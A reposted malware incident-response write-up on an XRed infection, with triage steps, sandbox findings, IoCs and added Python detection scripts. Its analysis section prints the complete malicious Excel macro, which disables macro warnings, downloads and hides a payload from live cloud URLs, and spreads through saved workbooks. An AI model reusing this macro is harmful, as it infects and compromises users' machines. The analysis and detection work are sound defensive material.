Incident Response Analysis of an XRed Virus Attack

admin · 2022-03-05 04:55:26 · 544 views · 6,236 characters · reading time 20 min 47 s




0x00 Preface

In day-to-day work, if an office computer or personal PC shows either of the following two anomalies, it has most likely been infected with the XRed virus, which belongs to the AutoRun family. Specifically:

1. Opening an .xlsx spreadsheet produces a macro prompt and the file's contents change; the most telling sign is that closing the spreadsheet changes its extension (xlsx → xlsm).

2. DNS request traffic contains resolution requests for the malicious domain xred.mooo.com, once every 10 minutes.
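The DNS indicator above is the easiest one to hunt for at scale. The script below is an added example (not part of the original article): it parses resolver log lines in an assumed, constructed format, groups lookups by client and queried name, and flags any pair that either matches the xred.mooo.com IoC or shows the regular ten-minute cadence described, then lists the clients that need triage. The log format, the client IPs and the sample lines are all constructed.

```python
"""Hunt resolver logs for the XRed DNS indicator: xred.mooo.com queried every ~10 min.

Added example, not from the original article. The log format below is an
assumption (one query per line); adapt LOG_RE to your resolver's own format.
"""
import re
from collections import defaultdict
from datetime import datetime
from statistics import median

# Assumed line shape: "<ISO-8601 UTC timestamp> client <ip> query <qname> <qtype>"
LOG_RE = re.compile(r"^(\S+)\s+client\s+(\S+)\s+query\s+(\S+)\s+(\S+)$")

# Domain IoC taken from the article
KNOWN_BAD = {"xred.mooo.com"}


def parse_line(line):
    """Return (epoch_seconds, client_ip, qname) or None for unparsable lines."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.fromisoformat(m.group(1).replace("Z", "+00:00"))
    return ts.timestamp(), m.group(2), m.group(3).rstrip(".").lower()


def find_beacons(lines, period=600.0, tolerance=0.10, min_queries=3, known_bad=KNOWN_BAD):
    """Flag (client, qname) pairs that match an IoC or beacon at `period` seconds.

    A pair counts as periodic when it has at least `min_queries` lookups and at
    least 80% of the gaps between consecutive lookups lie within
    tolerance*period of the expected period (a reboot or sleep may break one gap).
    """
    series = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            t, client, qname = rec
            series[(client, qname)].append(t)

    alerts = []
    for (client, qname), times in series.items():
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        regular = sum(abs(g - period) <= tolerance * period for g in gaps)
        periodic = len(times) >= min_queries and regular >= 0.8 * len(gaps)
        ioc = qname in known_bad
        if periodic or ioc:
            alerts.append({
                "client": client,
                "qname": qname,
                "queries": len(times),
                "median_gap": median(gaps) if gaps else None,
                "periodic": periodic,
                "ioc_match": ioc,
            })
    return alerts


def affected_clients(alerts, qname="xred.mooo.com"):
    """Clients that resolved the given name: the hosts to pull for triage."""
    return sorted(a["client"] for a in alerts if a["qname"] == qname)


# Constructed sample log: one infected client beaconing, plus benign noise
SAMPLE_LOG = [
    "2022-03-04T10:00:00Z client 10.0.0.5 query xred.mooo.com A",
    "2022-03-04T10:00:03Z client 10.0.0.5 query www.example.com A",
    "2022-03-04T10:10:01Z client 10.0.0.5 query xred.mooo.com A",
    "2022-03-04T10:14:30Z client 10.0.0.7 query mail.example.com A",
    "2022-03-04T10:20:00Z client 10.0.0.5 query xred.mooo.com A",
    "2022-03-04T10:29:59Z client 10.0.0.5 query xred.mooo.com A",
    "2022-03-04T10:31:10Z client 10.0.0.5 query www.example.com A",
    "2022-03-04T10:40:02Z client 10.0.0.5 query xred.mooo.com A",
    "garbage line that does not parse",
]

if __name__ == "__main__":
    found = find_beacons(SAMPLE_LOG)
    for alert in found:
        print(alert)
    print("clients to triage:", affected_clients(found))
```

The periodic check is deliberately independent of the IoC: if the domain is rotated, a client that still resolves something every 600 seconds with little jitter will be flagged on cadence alone, and the IoC match catches a single lookup that is not yet periodic.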



 


0x01 How the incident started

We were notified that a personal PC showed anomalous DNS resolution behaviour, and located the endpoint (by IP) to investigate.


0x02 Emergency triage

We located the specific endpoint and found it was a Windows 10 virtual machine. We checked the network, processes, registry, startup items and so on; apart from the anomalous DNS resolution (once every 10 minutes) there was no other impact. Details of the triage:

1. Analysis of the anomalous process showed the virus masquerading as the "Synaptics touchpad driver".

2. We traced the parent process, killed it, and so extracted the virus sample. (When extracting, remember to enable showing hidden files.)


3. We then ran a full scan with Huorong (火绒), which found no risk.


0x03 Sample analysis

We extracted the virus sample for further analysis. The procedure:

1. Use IDA to view the file's basic information

MD5: FBA313D7C15B420EE31C263E79EA90A7


2. Use Strings to view the strings contained in the program


3. With this basic information, run automated analysis in the Qianxin, 360 and ThreatBook (微步在线) cloud sandboxes.

Qianxin sandbox (screenshot)

360 sandbox (screenshot)

ThreatBook sandbox (screenshot)

4. Detailed sample execution behaviour

Host behaviour (screenshot)

Process behaviour (screenshot)

Network behaviour (screenshots)

5. The automated analysis already yielded a great deal of key information. The extracted macro code is as follows:

Dim SheetsChanged As Boolean
Dim SheetCount As Integer

' Runs on open: unhides all sheets, sets VBAWarnings = 1 ("enable all macros",
' which silences the macro security prompt for Excel and Word), then launches the payload.
Private Sub Workbook_Open()
    Dim i As Integer
    For i = 1 To ActiveWorkbook.Sheets.Count
        ActiveWorkbook.Sheets(i).Visible = xlSheetVisible
    Next i
    RegKeySave "HKCU\Software\Microsoft\Office\" & Application.Version & "\Excel\Security\VBAWarnings", 1, "REG_DWORD"
    RegKeySave "HKCU\Software\Microsoft\Office\" & Application.Version & "\Word\Security\VBAWarnings", 1, "REG_DWORD"
    Application.DisplayAlerts = False
    SheetCount = Worksheets.Count
    Call MPS
    ActiveWorkbook.Sheets(1).Select
    SheetsChanged = False
End Sub

' Suppresses the "save changes?" prompt when nothing was edited by the user.
Private Sub Workbook_BeforeClose(Cancel As Boolean)
    If Not SheetsChanged Then
        ActiveWorkbook.Saved = True
    End If
End Sub

Private Sub Workbook_SheetChange(ByVal Sh As Object, ByVal Target As Range)
    SheetsChanged = True
End Sub

Private Sub Workbook_NewSheet(ByVal Sh As Object)
    SheetsChanged = True
End Sub

Private Sub Workbook_SheetActivate(ByVal Sh As Object)
    If ActiveWorkbook.Sheets.Count <> SheetCount Then
        SheetsChanged = True
        SheetCount = ActiveWorkbook.Sheets.Count
    End If
End Sub

' Intercepts every save: hides the real sheets, saves, and on "Save As" forces the
' .xlsm (macro-enabled) format. This is why an .xlsx turns into an .xlsm.
Private Sub Workbook_BeforeSave(ByVal SaveAsUI As Boolean, Cancel As Boolean)
    Dim i As Integer
    Dim AIndex As Integer
    Dim FName
    AIndex = ActiveWorkbook.ActiveSheet.Index
    If SaveAsUI = False Then
        Cancel = True
        Application.EnableEvents = False
        Application.ScreenUpdating = False
        For i = 1 To ActiveWorkbook.Sheets.Count - 1
            ActiveWorkbook.Sheets(i).Visible = xlSheetHidden
        Next i
        ActiveWorkbook.Save
        For i = 1 To ActiveWorkbook.Sheets.Count
            ActiveWorkbook.Sheets(i).Visible = xlSheetVisible
        Next i
        ActiveWorkbook.Sheets(AIndex).Select
        SheetsChanged = False
        Application.ScreenUpdating = True
        Application.EnableEvents = True
    Else
        Cancel = True
        Application.EnableEvents = False
        Application.ScreenUpdating = False
        For i = 1 To ActiveWorkbook.Sheets.Count - 1
            ActiveWorkbook.Sheets(i).Visible = xlSheetHidden
        Next i
        FName = Application.GetSaveAsFilename(fileFilter:="Excel Çalışma Kitabı (*.xlsm), *.xlsm")
        If FName <> False Then
            ActiveWorkbook.SaveAs Filename:=FName, FileFormat:=xlOpenXMLWorkbookMacroEnabled
            SaveAsInj ActiveWorkbook.Path
        End If
        For i = 1 To ActiveWorkbook.Sheets.Count
            ActiveWorkbook.Sheets(i).Visible = xlSheetVisible
        Next i
        ActiveWorkbook.Sheets(AIndex).Select
        SheetsChanged = False
        Application.ScreenUpdating = True
        Application.EnableEvents = True
    End If
End Sub

' Copies the installed Synaptics.exe next to the saved workbook as a hidden
' system file named "~$cache1", so the workbook can re-infect on another host.
Sub SaveAsInj(DIR As String)
    Dim FSO As Object
    Dim FN As String
    Set FSO = CreateObject("scripting.filesystemobject")
    FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
    If FSO.FileExists(FN) Then
        If Not FSO.FileExists(DIR & "\~$cache1") Then
            FileCopy FN, DIR & "\~$cache1"
        End If
        SetAttr (DIR & "\~$cache1"), vbHidden + vbSystem
    End If
End Sub

Function RegKeyRead(i_RegKey As String) As String
    Dim myWS As Object
    On Error Resume Next
    Set myWS = CreateObject("WScript.Shell")
    RegKeyRead = myWS.RegRead(i_RegKey)
End Function

Function RegKeyExists(i_RegKey As String) As Boolean
    Dim myWS As Object
    On Error GoTo ErrorHandler
    Set myWS = CreateObject("WScript.Shell")
    myWS.RegRead i_RegKey
    RegKeyExists = True
    Exit Function
ErrorHandler:
    RegKeyExists = False
End Function

Sub RegKeySave(i_RegKey As String, _
               i_Value As String, _
               Optional i_Type As String = "REG_SZ")
    Dim myWS As Object
    Set myWS = CreateObject("WScript.Shell")
    myWS.RegWrite i_RegKey, i_Value, i_Type
End Sub

' Payload locator: prefers a copy already on disk (beside the workbook, in
' ALLUSERSPROFILE or System32), otherwise downloads it, then runs it hidden.
Sub MPS()
    Dim FSO As Object
    Dim FP(1 To 3), TMP, URL(1 To 3) As String
    Set FSO = CreateObject("scripting.filesystemobject")
    FP(1) = ActiveWorkbook.Path & "\~$cache1"
    FP(2) = ActiveWorkbook.Path & "\Synaptics.exe"
    URL(1) = "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download"
    URL(2) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"
    URL(3) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"
    TMP = Environ("Temp") & "\~$cache1.exe"
    If FSO.FileExists(FP(1)) Then
        If Not FSO.FileExists(TMP) Then
            FileCopy FP(1), TMP
        End If
        Shell TMP, vbHide
    ElseIf FSO.FileExists(FP(2)) Then
        If Not FSO.FileExists(TMP) Then
            FileCopy FP(2), TMP
        End If
        Shell TMP, vbHide
    Else
        If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
            Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
        ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
            Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
        ElseIf Not FSO.FileExists(TMP) Then
            If FDW((URL(1)), (TMP)) Then
            ElseIf FDW((URL(2)), (TMP)) Then
            ElseIf FDW((URL(3)), (TMP)) Then
            End If
            If FSO.FileExists(TMP) Then
                Shell TMP, vbHide
            End If
        Else
            Shell TMP, vbHide
        End If
    End If
End Sub

' Downloader: fetches MYU with WinHTTP and writes the body to NMA via ADODB.Stream,
' treating "Not Found" / Dropbox error pages as failures.
Function FDW(MYU, NMA As String) As Boolean
    Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
    If WinHttpReq Is Nothing Then
        Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
    End If
    WinHttpReq.Option(0) = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
    WinHttpReq.Option(6) = AllowRedirects
    WinHttpReq.Open "GET", MYU, False
    WinHttpReq.Send
    If (WinHttpReq.Status = 200) Then
        If (InStr(WinHttpReq.ResponseText, "404 Not Found") = 0) And (InStr(WinHttpReq.ResponseText, ">Not Found<") = 0) And (InStr(WinHttpReq.ResponseText, "Dropbox - Error") = 0) Then
            FDW = True
            Set oStream = CreateObject("ADODB.Stream")
            oStream.Open
            oStream.Type = 1
            oStream.Write WinHttpReq.ResponseBody
            oStream.SaveToFile (NMA)
            oStream.Close
        Else
            FDW = False
        End If
    Else
        FDW = False
    End If
End Function
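The behaviours in this macro can be checked mechanically rather than by reading every sample. The following is an added example (not from the article or the sample): a small rule-based scanner over extracted VBA source text, such as what olevba prints, that flags the auto-run entry point, the VBAWarnings write, the WinHTTP download, the ADODB.Stream file write, the hidden Shell launch, the hidden-attribute change and the forced re-save as .xlsm, and collects any URLs for the IoC list. The rule names, the scoring and the SAMPLE_MACRO excerpt are constructed; the excerpt is modelled on the macro above but is not the real sample.

```python
"""Rule-based triage of extracted VBA macro source for XRed-style behaviours.

Added example, not from the original article. Rules encode the behaviours of the
macro quoted on the page; SAMPLE_MACRO is a constructed excerpt, not the real sample.
"""
import re
from dataclasses import dataclass, field

# (rule name, pattern, what it means to a defender)
MACRO_RULES = [
    ("autoopen", re.compile(r"\bWorkbook_Open\b|\bAuto_Open\b|\bDocument_Open\b", re.I),
     "code runs automatically when the document is opened"),
    ("disable_macro_warnings", re.compile(r"VBAWarnings", re.I),
     "writes VBAWarnings (1 = enable all macros, no security prompt)"),
    ("registry_write", re.compile(r"\.RegWrite\b", re.I),
     "modifies the registry through WScript.Shell"),
    ("http_download", re.compile(r"WinHttp\.WinHttpRequest|MSXML2\.XMLHTTP|URLDownloadToFile", re.I),
     "downloads content from the internet"),
    ("write_binary", re.compile(r"ADODB\.Stream|\.SaveToFile\b", re.I),
     "writes a downloaded payload to disk"),
    ("hidden_exec", re.compile(r"\bShell\b.*\bvbHide\b", re.I),
     "launches a program with a hidden window"),
    ("hide_file", re.compile(r"\bSetAttr\b.*\bvbHidden\b", re.I),
     "sets hidden/system attributes on a dropped file"),
    ("save_as_macro_enabled", re.compile(r"xlOpenXMLWorkbookMacroEnabled", re.I),
     "re-saves the workbook as .xlsm (the xlsx -> xlsm change)"),
]
URL_RE = re.compile(r"https?://[^\s\"']+")


@dataclass
class MacroReport:
    hits: dict = field(default_factory=dict)   # rule name -> [(line_no, line), ...]
    urls: list = field(default_factory=list)

    @property
    def score(self):
        """Number of distinct behaviours seen; XRed trips almost all of them."""
        return len(self.hits)


def scan_macro(source: str) -> MacroReport:
    """Apply every rule to each non-comment line of the VBA source."""
    report = MacroReport()
    for no, line in enumerate(source.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("'"):   # skip blank lines and VBA comments
            continue
        for name, rx, _why in MACRO_RULES:
            if rx.search(stripped):
                report.hits.setdefault(name, []).append((no, stripped))
        report.urls.extend(URL_RE.findall(stripped))
    return report


def describe(report: MacroReport):
    """Human-readable lines, one per triggered rule."""
    why = {name: text for name, _rx, text in MACRO_RULES}
    return [f"{name}: {why[name]} (lines {[n for n, _ in lines]})"
            for name, lines in report.hits.items()]


# Constructed excerpt modelled on the XRed macro; not the real sample.
SAMPLE_MACRO = r'''
' constructed excerpt, not the real sample
Private Sub Workbook_Open()
    RegKeySave "HKCU\Software\Microsoft\Office\" & Application.Version & "\Excel\Security\VBAWarnings", 1, "REG_DWORD"
    Call MPS
End Sub

Private Sub Workbook_BeforeSave(ByVal SaveAsUI As Boolean, Cancel As Boolean)
    ActiveWorkbook.SaveAs Filename:=FName, FileFormat:=xlOpenXMLWorkbookMacroEnabled
End Sub

Sub RegKeySave(k As String, v As String)
    CreateObject("WScript.Shell").RegWrite k, v, "REG_DWORD"
End Sub

Sub MPS()
    URL(1) = "https://example.invalid/Synaptics.rar?dl=1"
    If FDW(URL(1), TMP) Then Shell TMP, vbHide
End Sub

Function FDW(MYU, NMA As String) As Boolean
    Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
    Set oStream = CreateObject("ADODB.Stream")
    oStream.SaveToFile (NMA)
End Function
'''

if __name__ == "__main__":
    rep = scan_macro(SAMPLE_MACRO)
    print("\n".join(describe(rep)))
    print("score:", rep.score, "urls:", rep.urls)
```

A single hit (for example a Workbook_Open handler) is common in legitimate workbooks; it is the combination of the VBAWarnings write, a download, a file write and a hidden launch in one module that separates this family from ordinary automation macros, so alert on the score rather than on any single rule.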

 


0x04 Virus classification

Using retained full-traffic captures or a fresh packet capture, we used the DGA malicious domain detection tool developed by Mitian Lab to classify the family and locate the victim hosts.

Here we used the packet capture retained from the sandbox run; the result is shown in the screenshot.

(For tool usage and download, see "HVV: a DGA malicious domain detection tool based on 360 data":

https://mp.weixin.qq.com/s/EPiQY_8i4LWP_S3aaX2yYw)

0x05 Remediation recommendations

  1. Install antivirus software and update its signature database regularly

  2. Do not open emails, attachments or links from unknown sources

  3. Apply all system and application patches and keep them up to date

  4. Use strong passwords, avoid weak passwords, and change them regularly (endpoint baseline)

  5. Disable unnecessary file sharing where possible

  6. Raise security awareness

 


0x06 References

https://www.freebuf.com/articles/endpoint/222991.html

https://s.tencent.com/research/report/880.html

       
IOCs:

MD5
13358cfb6040fd4b2dba262f209464de
FBA313D7C15B420EE31C263E79EA90A7


C2 & URL
xred.mooo.com
freedns.afraid.org/api/?action=getdyndns&sha=a30fa9*****797bcc613562978
hxxps://docs.google.com/uc?id=0BxsM*****aHFYVkQxeFk&export=download
hxxps://www.dropbox.com/s/zh*****hwylq/Synaptics.rar?dl=1
hxxp://xred.site50.net/syn/*****.rar

Virus author email addresses

[email protected]

[email protected]

[email protected]
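The file-side IoCs above (the two MD5s and the fixed drop locations used by the macro) are easy to sweep for on a suspect host. The script below is an added example (not from the article): it walks given directories for the file names the macro drops, hashes them together with the fixed Synaptics paths, and reports MD5 matches. The `demo()` run stages a harmless, constructed file in a temporary directory and treats that file's own hash as an IoC only to exercise the matching path; it is not a real XRed hash.

```python
"""Host sweep for XRed artefacts: dropped file names and MD5 IoC matches.

Added example, not from the original article. XRED_MD5 holds the two MD5s from
the IoC list; the file written by demo() is a constructed placeholder.
"""
import hashlib
import os
import tempfile
from pathlib import Path

# MD5 IoCs from the article, lower-cased for comparison
XRED_MD5 = {"13358cfb6040fd4b2dba262f209464de", "fba313d7c15b420ee31c263e79ea90a7"}

# File names the macro stages or drops (from the macro's MPS and SaveAsInj routines)
DROP_NAMES = {"~$cache1", "~$cache1.exe", "synaptics.exe"}


def md5_file(path, chunk=1 << 20):
    """Stream the file so large binaries do not have to fit in memory."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def windows_drop_paths():
    """Fixed locations the macro checks; only meaningful on a Windows host."""
    env = os.environ
    out = []
    if env.get("ALLUSERSPROFILE"):
        out.append(Path(env["ALLUSERSPROFILE"]) / "Synaptics" / "Synaptics.exe")
    if env.get("WINDIR"):
        out.append(Path(env["WINDIR"]) / "System32" / "Synaptics" / "Synaptics.exe")
    if env.get("TEMP"):
        out.append(Path(env["TEMP"]) / "~$cache1.exe")
    return out


def sweep(roots, extra_paths=None, iocs=XRED_MD5):
    """Walk `roots` for dropped names, hash them plus `extra_paths`, and report.

    Each finding records the hash, whether it matches an IoC, and whether the
    name alone is suspicious (a new variant would change the hash, not the name).
    """
    candidates = list(windows_drop_paths() if extra_paths is None else extra_paths)
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                if name.lower() in DROP_NAMES:
                    candidates.append(Path(dirpath) / name)

    findings = []
    for p in candidates:
        p = Path(p)
        if not p.is_file():
            continue
        digest = md5_file(p)
        findings.append({
            "path": str(p),
            "md5": digest,
            "ioc_match": digest in iocs,
            "suspicious_name": p.name.lower() in DROP_NAMES,
        })
    return findings


def demo():
    """Constructed run: stage a harmless file named like the dropper in a temp dir."""
    with tempfile.TemporaryDirectory() as d:
        sample = Path(d) / "~$cache1"
        sample.write_bytes(b"constructed placeholder, not malware")
        (Path(d) / "report.xlsx").write_bytes(b"not a real workbook")
        digest = md5_file(sample)
        # the placeholder's own hash stands in for an IoC so the match path is exercised
        return sweep([d], extra_paths=(), iocs=XRED_MD5 | {digest}), digest


if __name__ == "__main__":
    results, _ = demo()
    for r in results:
        print(r)
```

Excel's own owner files are named `~$<workbook name>`, so a file called exactly `~$cache1` beside workbooks, especially one with the hidden and system attributes set, is specific to this macro and worth flagging even when its hash is unknown.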



Originally published on the WeChat official account 弥天安全实验室 (Mitian Security Lab): 记一次XRed病毒攻击应急分析

Reposted on CN-SEC (please keep this link when reposting): https://cn-sec.com/archives/816789.html
